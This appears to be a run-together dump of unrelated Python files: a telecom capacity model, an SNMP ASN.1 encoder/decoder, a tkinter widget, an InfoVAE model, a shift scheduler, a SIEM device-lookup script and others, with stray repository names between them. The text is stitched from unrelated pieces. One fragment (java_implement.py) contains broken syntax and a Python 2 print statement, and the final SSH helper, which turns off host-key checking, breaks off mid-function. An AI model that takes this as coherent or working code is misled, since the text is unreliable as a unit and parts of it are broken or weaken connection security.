the busy hour / 1 km² area = 0.2 Mbps/km² area demand """ users = ( (self.population / self.overbooking_factor) * (self.penetration / 100) * self.market_share ) user_throughput = users * self.user_demand demand_per_kmsq = user_throughput / self.area return demand_per_kmsq @property def population_density(self): """ Calculate population density for a specific population and area (persons per km²). """ return self.population / self.area def _calculate_site_density_macrocells(self): """ Calculate the macrocell site density (sites per km²). """ unique_sites = set() for asset in self.assets: if asset['type'] == 'macrocell_site': unique_sites.add(asset['site_ngr']) site_density = float(len(unique_sites)) / self.area return site_density def _calculate_site_density_small_cells(self): """ Calculate the small cell site density (sites per km²). """ small_cells = [] for asset in self.assets: if asset['type'] == 'small_cell': small_cells.append(asset) site_density = float(len(small_cells)) / self.area return site_density def _calculate_user_demand(self, user_throughput, simulation_parameters): """ Calculate Mb/second from GB/month supplied by throughput scenario. E.g. 2 GB per month * 1024 to find MB * 8 to covert bytes to bits * busy_hour_traffic = daily traffic taking place in the busy hour * 1/30 assuming 30 days per month * 1/3600 converting hours to seconds, = ~0.01 Mbps required per user """ busy_hour_traffic = simulation_parameters['busy_hour_traffic_percentage'] demand = user_throughput * 1024 * 8 * (busy_hour_traffic / 100) / 30 / 3600 if demand < 5: demand = 5 return demand def _macrocell_site_capacity(self, simulation_parameters): """ Find the macrocellular Radio Access Network capacity given the area assets and deployed frequency bands. """ capacity = 0 for frequency in [ '700', '800', '2600', '3500', '26000' ]: unique_sites = set() for asset in self.assets: for asset_frequency in asset['frequency']: if asset_frequency == frequency: unique_sites.add(asset['site_ngr']) site_density = float(len(unique_sites)) / self.area bandwidth = find_frequency_bandwidth(frequency, simulation_parameters) if frequency == '700' or frequency == '3500' or frequency == '26000': generation = '5G' else: generation = '4G' if site_density > 0: tech_capacity = lookup_capacity( self._capacity_lookup_table, self.clutter_environment, 'macro', frequency, bandwidth, generation, site_density, ) else: tech_capacity = 0 capacity += tech_capacity return capacity def small_cell_capacity(self, simulation_parameters): """ Find the small cell Radio Access Network capacity given the area assets and deployed frequency bands. """ capacity = 0 for frequency in ['3700', '26000']: num_small_cells = len([ asset for asset in self.assets if asset['type'] == "small_cell" ]) site_density = float(num_small_cells) / self.area bandwidth = find_frequency_bandwidth(frequency, simulation_parameters) if site_density > 0 : tech_capacity = lookup_capacity( self._capacity_lookup_table, self.clutter_environment, "micro", frequency, bandwidth, "5G", site_density, ) else: tech_capacity = 0 capacity += tech_capacity return capacity def find_frequency_bandwidth(frequency, simulation_parameters): """ Finds the correct bandwidth for a specific frequency from the simulation parameters. """ simulation_parameter = 'channel_bandwidth_{}'.format(frequency) if simulation_parameter not in simulation_parameters.keys(): KeyError('{} not specified in simulation_parameters'.format(frequency)) bandwidth = simulation_parameters[simulation_parameter] return bandwidth def pairwise(iterable): """ Return iterable of 2-tuples in a sliding window. >>> list(pairwise([1,2,3,4])) [(1,2),(2,3),(3,4)] """ a, b = tee(iterable) next(b, None) return zip(a, b) def lookup_clutter_geotype(clutter_lookup, population_density): """ Return geotype based on population density Parameters ---------- clutter_lookup : list A list of tuples sorted by population_density_upper_bound ascending (population_density_upper_bound, geotype). population_density : float The current population density requiring the lookup. """ highest_popd, highest_geotype = clutter_lookup[2] middle_popd, middle_geotype = clutter_lookup[1] lowest_popd, lowest_geotype = clutter_lookup[0] if population_density < middle_popd: return lowest_geotype elif population_density > highest_popd: return highest_geotype else: return middle_geotype def lookup_capacity(lookup_table, environment, cell_type, frequency, bandwidth, generation, site_density): """ Use lookup table to find capacity by clutter environment geotype, frequency, bandwidth, technology generation and site density. """ if (environment, cell_type, frequency, bandwidth, generation) not in lookup_table: raise KeyError("Combination %s not found in lookup table", (environment, cell_type, frequency, bandwidth, generation)) density_capacities = lookup_table[ (environment, cell_type, frequency, bandwidth, generation) ] lowest_density, lowest_capacity = density_capacities[0] if site_density < lowest_density: return 0 for a, b in pairwise(density_capacities): lower_density, lower_capacity = a upper_density, upper_capacity = b if lower_density <= site_density and site_density < upper_density: result = interpolate( lower_density, lower_capacity, upper_density, upper_capacity, site_density ) return result # If not caught between bounds return highest capacity highest_density, highest_capacity = density_capacities[-1] return highest_capacity def interpolate(x0, y0, x1, y1, x): """ Linear interpolation between two values. """ y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0) return y def assemble_author_name(author: dict) -> str: # Even though the Unpaywall schema (https://unpaywall.org/data-format#doi-object) # says z_authors is exclusively a Crossref Contributor schema # https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md#contributor # however, for DOI 10.1007/s00350-021-5862-6 the author schema contains no "given" # or "family" key but a "name" key instead. if "name" in author: return author["name"] name_components = [] if "given" in author: name_components.append(author["given"]) if "family" in author: name_components.append(author["family"]) if not name_components: name_components.append("unknown authors") return " ".join(name_components) from tkinter import Label, Button, StringVar from ..component import Component from ..extensions import GridHelper from .constants import Constants class TextCarousel(Component.with_extensions(GridHelper)): def __init__(self, container, get_data, on_change=(lambda carousel, increment_amount: None), amount_to_display=1, index=0, update_interval=None, styles=None): super().__init__(container, get_data=get_data, on_change=on_change, update_interval=update_interval, styles=styles) self.index = index styles = styles or {} self.styles["button"] = styles.get("button", {}) self.styles["label"] = styles.get("label", {}) self.values = self._get_data(self) self._displayed_text__vars = [StringVar() for i in range(amount_to_display)] self._update_displayed_text() def _update(self): self.values = self._get_data(self) self._update_displayed_text() self._set_button_states() def _render(self): self.children["back_button"] = None self.children["forward_button"] = None self.children["labels"] = [] row_index, column_index = 0, 0 self._apply_frame_stretch(columns=list(range(1, len(self._displayed_text__vars)+1)), rows=[0]) back_button = Button(self._frame, text=Constants.SYMBOLS["arrows"]["left"], command=lambda: self._handle_click(-1), **self.styles["button"]) self.children["back_button"] = back_button back_button.grid(row=row_index, column=column_index, sticky="nswe") column_index += 1 for text__var in self._displayed_text__vars: label = Label(self._frame, textvariable=text__var, **self.styles["label"]) self.children["labels"].append(label) label.grid(row=row_index, column=column_index, sticky="nswe") column_index += 1 forward_button = Button(self._frame, text=Constants.SYMBOLS["arrows"]["right"], command=lambda: self._handle_click(1), **self.styles["button"]) self.children["forward_button"] = forward_button forward_button.grid(row=row_index, column=column_index, sticky="nswe") self._set_button_states() def _handle_click(self, increment_amount): self.values = self._get_data(self) self.index += increment_amount self.index = max(0, self.index) self.index = min(len(self.values) - len(self._displayed_text__vars), self.index) self._on_change(self, increment_amount) if self.exists: self._update() def _set_button_states(self): self.children["back_button"].config(state="disabled" if self.index == 0 else "normal") self.children["forward_button"].config( state="disabled" if self.index + len(self._displayed_text__vars) == len(self.values) else "normal") def _update_displayed_text(self): for var_index, text__var in enumerate(self._displayed_text__vars): value = self.values[self.index + var_index] text__var.set(value) stjordanis/graph4nlp100-1000 ''' Created on Nov, 2018 @author: hugo ''' import json import numpy as np def dump_ndarray(data, path_to_file): try: with open(path_to_file, 'wb') as f: np.save(f, data) except Exception as e: raise e def load_ndarray(path_to_file): try: with open(path_to_file, 'rb') as f: data = np.load(f) except Exception as e: raise e return data def dump_ndjson(data, file): try: with open(file, 'w') as f: for each in data: f.write(json.dumps(each) + '\n') except Exception as e: raise e def load_ndjson(file, return_type='array'): if return_type == 'array': return load_ndjson_to_array(file) elif return_type == 'dict': return load_ndjson_to_dict(file) else: raise RuntimeError('Unknown return_type: %s' % return_type) def dump_json(data, file, indent=None): try: with open(file, 'w') as f: json.dump(data, f, indent=indent) except Exception as e: raise e def load_json(file): try: with open(file, 'r') as f: data = json.load(f) except Exception as e: raise e return data chey/snmp-agent from __future__ import annotations from typing import List, Dict, Tuple, Any, Optional import ipaddress import asn1 # SNMP Version class VersionValue(object): def __init__(self, name: str, code: int): self.name = name self.code = code class VERSION(object): V1 = VersionValue(name='v1', code=0x00) V2C = VersionValue(name='v2c', code=0x01) # ASN.1 TAG class Tag(object): def __init__(self, name, code): self.name = name self.code = code def get_class(self) -> int: return self.code & 0xc0 def get_pc(self) -> int: return self.code & 0x20 def get_tag_number(self) -> int: return self.code & 0x1f class ASN1(object): BOOLEAN = Tag(name='BOOLEAN', code=0x01) INTEGER = Tag(name='INTEGER', code=0x02) OCTET_STRING = Tag(name='OCTET_STRING', code=0x04) NULL = Tag(name='NULL', code=0x05) OBJECT_IDENTIFIER = Tag(name='OBJECT_IDENTIFIER', code=0x06) SEQUENCE = Tag(name='SEQUENCE', code=0x30) IPADDRESS = Tag(name='IPADDRESS', code=0x40) COUNTER32 = Tag(name='COUNTER32', code=0x41) GAUGE32 = Tag(name='GAUGE32', code=0x42) TIME_TICKS = Tag(name='TIME_TICKS', code=0x43) COUNTER64 = Tag(name='COUNTER64', code=0x46) NO_SUCH_OBJECT = Tag(name='NO_SUCH_OBJECT', code=0x80) NO_SUCH_INSTANCE = Tag(name='NO_SUCH_INSTANCE', code=0x81) END_OF_MIB_VIEW = Tag(name='END_OF_MIB_VIEW', code=0x82) GET_REQUEST = Tag(name='GET_REQUEST', code=0xA0) GET_NEXT_REQUEST = Tag(name='GET_NEXT_REQUEST', code=0xA1) GET_RESPONSE = Tag(name='GET_RESPONSE', code=0xA2) SET_REQUEST = Tag(name='SET_REQUEST', code=0xA3) GET_BULK_REQUEST = Tag(name='GET_BULK_REQUEST', code=0xA5) class SNMPValue(object): def __init__(self): self.tag: Tag def get_class(self) -> int: return self.tag.get_class() def get_pc(self) -> int: return self.tag.get_pc() def get_tag_number(self) -> int: return self.tag.get_tag_number() class SNMPLeafValue(SNMPValue): def __init__(self): self.value: Any self.tag: Tag def encode(self) -> bytes: raise NotImplementedError class Integer(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.INTEGER def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class Boolean(SNMPLeafValue): def __init__(self, value: bool): self.value = value self.tag = ASN1.INTEGER def encode(self) -> bytes: return asn1.Encoder._encode_boolean(self.value) class OctetString(SNMPLeafValue): def __init__(self, value: str): self.value = value self.tag = ASN1.OCTET_STRING def encode(self) -> bytes: return asn1.Encoder._encode_octet_string(self.value) class Null(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.NULL def encode(self) -> bytes: return asn1.Encoder._encode_null() class ObjectIdentifier(SNMPLeafValue): def __init__(self, value: str): self.value = value self.tag = ASN1.OBJECT_IDENTIFIER def encode(self) -> bytes: return asn1.Encoder()._encode_object_identifier(self.value) class IPAddress(SNMPLeafValue): def __init__(self, value: str): self.value = value self.tag = ASN1.IPADDRESS def encode(self) -> bytes: return asn1.Encoder._encode_integer(int(ipaddress.IPv4Address(self.value))) class Counter32(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.COUNTER32 def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class Gauge32(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.GAUGE32 def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class TimeTicks(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.TIME_TICKS def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class Counter64(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.COUNTER64 def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class NoSuchObject(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.NO_SUCH_OBJECT def encode(self) -> bytes: return b'' class NoSuchInstance(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.NO_SUCH_INSTANCE def encode(self) -> bytes: return b'' class EndOfMibView(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.END_OF_MIB_VIEW def encode(self) -> bytes: return b'' class SNMPConstructedValue(SNMPValue): pass class Sequence(SNMPConstructedValue): def __init__(self): self.tag = ASN1.SEQUENCE class SnmpContext(SNMPConstructedValue): pass class SnmpGetContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_REQUEST class SnmpGetNextContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_NEXT_REQUEST class SnmpGetBulkContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_BULK_REQUEST class SnmpGetResponseContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_RESPONSE class Encoder(object): def __init__(self): self._encoder = asn1.Encoder() self._encoder.start() def enter(self, value: SNMPConstructedValue): self._encoder.enter(cls=value.get_class(), nr=value.get_tag_number()) def leave(self): self._encoder.leave() def write(self, value: SNMPLeafValue): self._encoder._emit_tag(cls=value.get_class(), typ=value.get_pc(), nr=value.get_tag_number()) value_bytes = value.encode() self._encoder._emit_length(len(value_bytes)) self._encoder._emit(value_bytes) def output(self) -> bytes: return self._encoder.output() def encode_response(response: SNMPResponse) -> bytes: encoder = Encoder() encoder.enter(Sequence()) encoder.write(Integer(response.version.code)) encoder.write(OctetString(response.community)) encoder.enter(response.context) encoder.write(Integer(response.request_id)) encoder.write(Integer(response.error_status)) encoder.write(Integer(response.error_index)) encoder.enter(Sequence()) for variable_binding in response.variable_bindings: encoder.enter(Sequence()) encoder.write(ObjectIdentifier(variable_binding.oid)) encoder.write(variable_binding.value) encoder.leave() encoder.leave() encoder.leave() encoder.leave() return encoder.output() class Decoder(object): def __init__(self, data: bytes): self._decoder = asn1.Decoder() self._decoder.start(data=data) def enter(self): self._decoder.enter() def read(self) -> Tuple[Any, Any]: # TODO: Look into response type warning return self._decoder.read() # (asn1.Tag, value) def peek(self) -> asn1.Tag: return self._decoder.peek() def eof(self) -> bool: return self._decoder.eof() def leave(self): self._decoder.leave() def decode_request(data: bytes) -> SNMPRequest: decoder = Decoder(data=data) # Get version and community decoder.enter() _, _value = decoder.read() version_code: int = _value if VERSION.V1.code == version_code: version = VERSION.V1 elif VERSION.V2C.code == version_code: version = VERSION.V2C else: raise NotImplementedError(f"SNMP Version code '{version_code}' is not implemented") _, _value = decoder.read() community = _value.decode() # Get pdu_type, request_id, non_repeaters and max_repetitions _tag = decoder.peek() _pdu_type_code = _tag.cls | _tag.typ | _tag.nr if ASN1.GET_REQUEST.code == _pdu_type_code: context = SnmpGetContext() elif ASN1.GET_NEXT_REQUEST.code == _pdu_type_code: context = SnmpGetNextContext() elif ASN1.GET_BULK_REQUEST.code == _pdu_type_code: context = SnmpGetBulkContext() else: raise NotImplementedError(f"PDU-TYPE code '{_pdu_type_code}' is not implemented") decoder.enter() _, _value = decoder.read() request_id: int = _value non_repeaters: int max_repetitions: int if isinstance(context, SnmpGetBulkContext): _, _value = decoder.read() non_repeaters = _value _, _value = decoder.read() max_repetitions = _value else: _, _ = decoder.read() _, _ = decoder.read() non_repeaters = 0 max_repetitions = 0 # Get variable-bindings decoder.enter() variable_bindings = [] while not decoder.eof(): # Get oid, type and value decoder.enter() _, _value = decoder.read() oid: str = _value _, _ = decoder.read() variable_bindings.append(VariableBinding(oid=oid, value=Null())) decoder.leave() decoder.leave() decoder.leave() decoder.leave() return SNMPRequest( version=version, community=community, context=context, request_id=request_id, non_repeaters=non_repeaters, max_repetitions=max_repetitions, variable_bindings=variable_bindings) class SNMP(object): def __init__(self): pass def to_dict(self): dict_ = self._to_primitive(self) return dict_ def _to_primitive(self, value): if isinstance(value, dict): _dict = {} for k, v in value.items(): _dict[k] = self._to_primitive(v) return _dict elif isinstance(value, list): items = [] for item in value: items.append(self._to_primitive(item)) return items elif isinstance(value, (int, str, bool)) or value is None: return value else: _dict = {} for k, v in vars(value).items(): _dict[k] = self._to_primitive(v) return _dict class SNMPRequest(SNMP): def __init__(self, version: VersionValue, community: str, context: SnmpContext, request_id: int, variable_bindings: List[VariableBinding], non_repeaters: int = 0, max_repetitions: int = 0): self.version = version self.community = community self.context = context self.request_id = request_id self.non_repeaters = non_repeaters self.max_repetitions = max_repetitions self.variable_bindings = variable_bindings def create_response(self, variable_bindings: List[VariableBinding], error_status: int = 0, error_index: int = 0): return SNMPResponse( version=self.version, community=self.community, request_id=self.request_id, variable_bindings=variable_bindings, error_status=error_status, error_index=error_index) class SNMPResponse(SNMP): def __init__(self, version: VersionValue, community: str, request_id: int, variable_bindings: List[VariableBinding], error_status: int = 0, error_index: int = 0): self.version = version self.community = community self.context = SnmpGetResponseContext() self.request_id = request_id self.error_status = error_status self.error_index = error_index self.variable_bindings = variable_bindings class VariableBinding(SNMP): def __init__(self, oid: str, value: SNMPLeafValue): self.oid = oid.lstrip(".") self.value = value def encode(self): return self.value.encode() nicolageorge/idiomaticpythonjava-to-python/java_implement.py import jnettool.tools.elements.NetworkElement \ jnettool.tools.Routing \ jnettool.tools.RouteInspector ne = jnettool.tools.elements.NetworkElement('127.0.0.1') try: routing_table - ne.getRoutingTable() # fetch table except jnettool.tools.elements.MissingVar: # record table fault logging.exception('no routing table found') # undo partial changes ne.cleanup('rollback') else: num_routes = routing_table.getSize() # determine table size for RToffset in range(num_routes): route = routing_table.getRouteByIndex(RToffset) name = route.getName() # route name ipaddr = route.getIPAddr() # ip address print "{0} -> {1}".format(name, ipaddr) # format nicely finally: ne.cleanup('commit') ne.disconnect()import datetime import itertools import logging import random import gamla from shift_scheduler import schedule, time_utils _is_weekend = gamla.anyjuxt( time_utils.is_friday, time_utils.is_saturday, ) @gamla.curry def _availabilty(working_weekends, scheduling, shift, person): return not gamla.anymap(_is_weekend, shift) or person in working_weekends def _weekday_shifts(start_date): buffer = () current = start_date while True: if time_utils.is_sunday(current): buffer = () if time_utils.is_friday(current): yield buffer buffer = () buffer = (*buffer, current) current += datetime.timedelta(days=1) def _weekend_shifts(start_date): buffer = () current = start_date while True: if time_utils.is_friday(current): buffer = () if time_utils.is_sunday(current): yield buffer buffer = () buffer = (*buffer, current) current += datetime.timedelta(days=1) _days_to_weight = gamla.compose_left( gamla.map( gamla.ternary( _is_weekend, gamla.just(2), gamla.just(1), ), ), sum, ) def _weighted_shifts(scheduling): return gamla.compose_left( schedule.shifts_manned_by_person(scheduling), gamla.concat, _days_to_weight, ) def _run(working_weekends, not_working_weekends): everyone = working_weekends + not_working_weekends # Shuffle to avoid situations where people order consistently # makes some people get more shifts. random.shuffle(everyone) return gamla.reduce( schedule.assign_shift( everyone, _availabilty(working_weekends), lambda scheduling, shift: schedule.compare_by( [ _weighted_shifts(scheduling), ], ), ), {}, gamla.pipe( datetime.date(2020, 7, 26), # In small numbers it is better to allocate first the weekend shifts, # otherwise we might over-allocate people who do all shift kinds. gamla.juxt(_weekend_shifts, _weekday_shifts), gamla.mapcat(gamla.take(22)), ), ) _flatten_days = gamla.mapcat( gamla.compose_left( gamla.star( lambda person, shift: ( (person,), shift, ), ), gamla.star(itertools.product), ), ) _scheduling_to_text = gamla.compose_left( _flatten_days, gamla.map( gamla.compose_left( gamla.star( lambda person, date: (date.strftime("%Y-%m-%d %A"), person, "\n"), ), "\t".join, lambda s: s.expandtabs(25), ), ), gamla.sort, ) _print_justice = gamla.compose_left( _flatten_days, gamla.edges_to_graph, gamla.valmap( gamla.juxt( gamla.compose_left( _days_to_weight, gamla.wrap_str("weight: {}"), ), gamla.compose_left(gamla.count, gamla.wrap_str("total: {}")), gamla.compose_left( gamla.filter(_is_weekend), gamla.count, gamla.wrap_str("weekend: {}"), ), ), ), logging.info, ) def _write(): text = gamla.pipe( _run( [ "a", "b", "c", "d", "e", "f", "g", "h", ], [ "i", "j", ], ), gamla.side_effect(_print_justice), _scheduling_to_text, ) open("./oncall_rotation.txt", "w").writelines(text) _write() codewof/programming/content/en/less-than-6/solution.py def print_less_than_6(numbers): for num in numbers: if num < 6: print(num) import tensorflow as tf import numpy as np import src.utils as utils """ Implementation of InfoVAE https://arxiv.org/abs/1706.02262 """ def reparameterise(x, n, stddev): """ Model each output as bing guassian distributed. Use the reparameterisation trick so we can sample while remaining differentiable. """ with tf.name_scope('reparameterise'): z_mean = x[:,:,:,:n] z_stddev = x[:,:,:,n:] e = tf.random_normal(tf.shape(z_mean), stddev=stddev) # TODO log_var or stddev? return z_mean + tf.square(z_stddev)*e def compute_kernel(x, y): """ Compute the distance between x and y using a guassian kernel. """ x_size = tf.shape(x)[0] y_size = tf.shape(y)[0] dim = tf.shape(x)[1] tiled_x = tf.tile(tf.reshape(x, [x_size, 1, dim]), [1, y_size, 1]) tiled_y = tf.tile(tf.reshape(y, [1, y_size, dim]), [x_size, 1, 1]) return tf.exp(-tf.reduce_mean(tf.square(tiled_x - tiled_y), axis=2) / tf.cast(dim, tf.float32)) def compute_mmd(x, y): """ Calculate the maximum mean disrepancy.. """ x_kernel = compute_kernel(x, x) y_kernel = compute_kernel(y, y) xy_kernel = compute_kernel(x, y) return tf.reduce_mean(x_kernel) + tf.reduce_mean(y_kernel) - 2 * tf.reduce_mean(xy_kernel) def gaussian_d(x, y): """ A conceptual lack of understanding here. Do I need a dx to calculate this over? Doesnt make sense for a single point!? """ d = tf.norm(x - y, axis=1) return tf.exp(-0.5*d)/(tf.sqrt(2*tf.constant(np.pi))) def pz(z): """ Estimate p(z) using our prior on z. """ z = tf.layers.flatten(z) return gaussian_d(z , tf.zeros_like(z)) def px_z(x_, y): # the added noise in the hidden layer. return gaussian_d(tf.layers.flatten(y[:,:,:,:1]), tf.layers.flatten(x_)) def pz_x(h, z): # the added noise in the final layer. shape = h.get_shape().as_list() return gaussian_d(tf.layers.flatten(h[:,:,:,:shape[-1]//2]), tf.layers.flatten(z)) def p_bayes(x_, y, h, z): """ If p(z | x) is far away from p(z) then p(x) is low p(x) = p(x | z) p(z) / p(z | x) """ return px_z(x_, y) * pz(z) / pz_x(h, z) # def KL_divergence(p, q): # return tf.reduce_sum(p * tf.log(p/q), axis=-1) # # def bayesian_surprise(z): # """ # # """ # return kl(z, prior) class InfoVAE(): def __init__(self, n_hidden, width, depth, stddev=0.0001): """ Args: """ self.n_hidden = n_hidden self.width = width self.depth = depth self.n_channels = 1 self.stddev = stddev self.construct() def construct(self): """ Constructs: encoder (tf.keras.Model): encode the gradient into the hidden space decoder (tf.keras.Model): decodes a hidden state into an image """ layers = [] layers.append(tf.keras.layers.Conv2D(self.width, 4, strides=(2, 2), padding='same', # input_shape=(28,28,1) )) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) for i in range(self.depth): layers.append(tf.keras.layers.Conv2D(self.width, 4, strides=(2, 2), padding='same'),) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) layers.append(tf.keras.layers.Conv2D(self.n_hidden*2, 1, strides=(1, 1), padding='same')) self.encoder = tf.keras.Sequential(layers) # decoder layers = [] layers.append(tf.keras.layers.Conv2DTranspose(self.width, 4, strides=(2, 2), padding='same', # input_shape=(1,1,self.n_hidden) )) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) for _ in range(self.depth): layers.append(tf.keras.layers.Conv2DTranspose(self.width, 4, strides=(2, 2), padding='same')) layers.append(tf.keras.layers.Activation(tf.keras.activations.selu)) layers.append(tf.keras.layers.Conv2DTranspose(self.n_channels*2, 1, strides=(1, 1), padding='same')) self.decoder = tf.keras.Sequential(layers) def __call__(self, x): """ Args: x (tf.tensor): the input shape is [None, width, height, channels], dtype is tf.float32 """ with tf.name_scope('infovae'): self.h = self.encoder(x) self.z = reparameterise(self.h, self.n_hidden, self.stddev) self.y = self.decoder(self.z) self.x_ = reparameterise(self.y, self.n_channels, self.stddev) return self.x_ def make_losses(self, x, y=None): self.x = x if y is None: print('...') y = self.__call__(self.x) with tf.name_scope('loss'): recon_loss = tf.losses.sigmoid_cross_entropy( logits=tf.layers.flatten(y), multi_class_labels=tf.layers.flatten(self.x)) latent_loss = compute_mmd(tf.layers.flatten(self.z), tf.layers.flatten(tf.random_normal(shape=tf.shape(self.z)))) return recon_loss, latent_loss def make_contractive_loss(self): # assumes make_losses has already been called print(self.h, self.x) dhdx = tf.gradients(self.h, self.x)[0] print(dhdx) if dhdx is None: raise ValueError() return tf.reduce_mean(tf.reduce_sum(tf.square(dhdx), axis=[1,2,3])) def estimate_density(self, x): x_ = self.__call__(x) return p_bayes(x_, self.y, self.h, self.z) @staticmethod def preprocess(x): im = np.reshape(x, [-1, 28, 28, 1]) im = np.round(im).astype(np.float32) # NOTE important !? return np.pad(im, [(0,0), (2,2), (2,2), (0,0)], 'constant', constant_values=0) if __name__ == '__main__': tf.enable_eager_execution() x = tf.random_normal((100, 28, 28, 1)) nn = InfoVAE(12, 16, 3) x_ = nn(x) # loss = nn.make_losses(x) assert x_.shape == x.shape #!/usr/local/bin/python3 # Requirements : # - msiempy (https://github.com/mfesiem/msiempy) # - manuf (https://github.com/coolbho3k/manuf) """ Usage example : ./find_dhcp_device.py -t last_hour -v Apple -m Macbook """ import argparse import copy import re import pprint import dateutil import msiempy import msiempy.event from manuf import manuf # DHCP log signature ID DHCP_RENEW = "272-11" # to change depending of your value # RADIUS login log signature ID RADIUS_START = "268-2239707159" # to change depending of your value # Key mapping for hostname and username, SIEM returns weird values... # Not necessary in newer version of the module HostID = "Alert.BIN(4)" UserIDSrc = "Alert.BIN(7)" TEMPLATE_ROW = dict(user="", host="", macaddress="", seen="", ip="") def parse_args(): parser = argparse.ArgumentParser( description="Request logs, aggregate, and print it." ) parser.add_argument( "--time_range", "-t", metavar="time_range", help="Timerange, choose from " + ", ".join(msiempy.FilteredQueryList.POSSIBLE_TIME_RANGE), required=True, ) parser.add_argument( "-m", "--hostname_must_contains", metavar="Hostname match", nargs="+", default=[], ) parser.add_argument( "-v", "--vendors", metavar="Vendor match", nargs="+", default=[] ) args = parser.parse_args() return args def find(time_range, hostname_must_contains=[], vendors=[]): events = msiempy.event.EventManager( fields=["HostID", "UserIDSrc", "SrcIP", "SrcMac", "DSIDSigID"], time_range=time_range, filters=[ msiempy.event.FieldFilter("Alert.DSIDSigID", [DHCP_RENEW, RADIUS_START]) ], limit=500, ) print("Loading data...") events.load_data(slots=10, workers=5, max_query_depth=2) print("{} events have been loaded from the SIEM".format(len(events))) if len(vendors) > 0: print("Filtering vendors...") mac = manuf.MacParser(update=True) vendor_filtered_events = list() for event in events: device_vendor = mac.get_manuf(event["Alert.SrcMac"]) if device_vendor == None: continue for vendor in vendors: if vendor.lower() in device_vendor.lower(): vendor_filtered_events.append(event) break events = vendor_filtered_events print("{} events matches the vendor(s)".format(len(events))) print("Aggregating events and devices...") devices = aggregate_list_based_on_SrcMac(events) print("{} unique devices in total".format(len(devices))) # Apply host filters host_filtered_devices = list() for dev in devices: if len(hostname_must_contains) == 0 or any( [ match.lower() in dev.get("host").lower() for match in hostname_must_contains ] ): host_filtered_devices.append(dev) if len(devices) > len(host_filtered_devices): devices = host_filtered_devices print("{} devices matches hostname filter(s)".format(len(devices))) return msiempy.NitroList(alist=devices) def aggregate_list_based_on_SrcMac(event_list): new_list = list() nbDevicesAdded = 0 devicesUpdated = set() for event in event_list: found = False for entry in new_list: # if the computer was already there in the database if entry["macaddress"] == event["Alert.SrcMac"]: found = True # Updates the last seen date and IP address # If the event is more recent that the last seen entry date if dateutil.parser.parse( event["Alert.LastTime"] ) > dateutil.parser.parse(entry["seen"]): entry["seen"] = event["Alert.LastTime"] entry["ip"] = event["Alert.SrcIP"] # if the hostname is not empty, the two hostnames are not equals and the event is a dhcp event if ( len(event[HostID]) > 0 and entry["host"] != event[HostID] and (event["Alert.DSIDSigID"] == DHCP_RENEW) ): # Update the hostname entry["host"] = event[HostID] # if the SIEM user field is not empty and the event is a radius login and the username is not already filled in the entry and the field is not a macaddress if ( len(event[UserIDSrc]) > 0 and event["Alert.DSIDSigID"] == RADIUS_START and entry["user"] != event[UserIDSrc] and re.match( r"""[0-9a-f]{2}([-])[0-9a-f]{2}(\1[0-9a-f]{2}){4}$""", event[UserIDSrc], ) is None ): # Update the username entry["user"] = event[UserIDSrc] devicesUpdated.update([event["Alert.SrcMac"]]) if not found: entry = copy.copy(TEMPLATE_ROW) # we cannot trust the host infos from the radius events if event["Alert.DSIDSigID"] != RADIUS_START: entry["host"] = event[HostID] # And we cannot trust the user info from the dhcp events. And sometime the user fields is a macaddress actually, so we ignore that elif event["Alert.DSIDSigID"] == RADIUS_START and not re.match( r"""[0-9a-f]{2}([-])[0-9a-f]{2}(\1[0-9a-f]{2}){4}$""", event[UserIDSrc] ): entry["user"] = event[UserIDSrc] entry["seen"] = event["Alert.LastTime"] entry["macaddress"] = event["Alert.SrcMac"] entry["ip"] = event["Alert.SrcIP"] new_list.append(entry) nbDevicesAdded += 1 print("{} devices were added".format(nbDevicesAdded)) print("{} devices were updated".format(len(devicesUpdated))) return new_list # MAIN PROGRAM if __name__ == "__main__": args = parse_args() devices = find( time_range=args.time_range, hostname_must_contains=args.hostname_must_contains, vendors=args.vendors, ) print(devices.get_text()) # move to initial position maw(tx, 0, ty, -4, tz, 0, rz, 0, rx, 0, ry, 0, omega, 0, detarm, 0) pause("Scan t2t 0..1 in steps of 0.1 with count time 2s.") sscan(t2t, 0, .1, 1, 2.0) pause("Move t2t to 0.") maw(t2t, 0) pause("Scan ty -5..5 in steps of 0.5 with count time 1s.") sscan(ty, -5, .5, 5, 1.0) pause("Move ty to 0.") maw(ty, 0) pause("Scan tx -5..5 in steps of 0.5 with count time 1s.") sscan(tx, -5, .5, 5, 1.0) pause("Move tx to 0.") maw(tx, 0) pause("Scan tz -20..20 in steps of 1 with count time 1s.") sscan(tz, -20, 1, 20, 1.0) pause("Move tz to 0.") maw(tz, 0) pause("Scan ry -3..3 in steps of .5 with count time 1s.") sscan(ry, -3, .5, 3, 1.0) pause("Move ry to 0.") maw(ry, 0) pause("Move detarm into guide - emergency stop penetration test.") maw(detarm, -10)import os import sys import shlex import click # CREDIT: https://gist.github.com/bortzmeyer/1284249#gistcomment-3074036 def create_ssh(ip: str, port: str, user: str, debug: bool, cd_folder: str = None, shell: str = 'bash'): """Create a ssh session""" ssh = f'/usr/bin/ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o LogLevel=ERROR -p {port} {user}@{ip}' if cd_folder: ssh = ssh + f' -t "cd {cd_folder}; {shell} --login"' 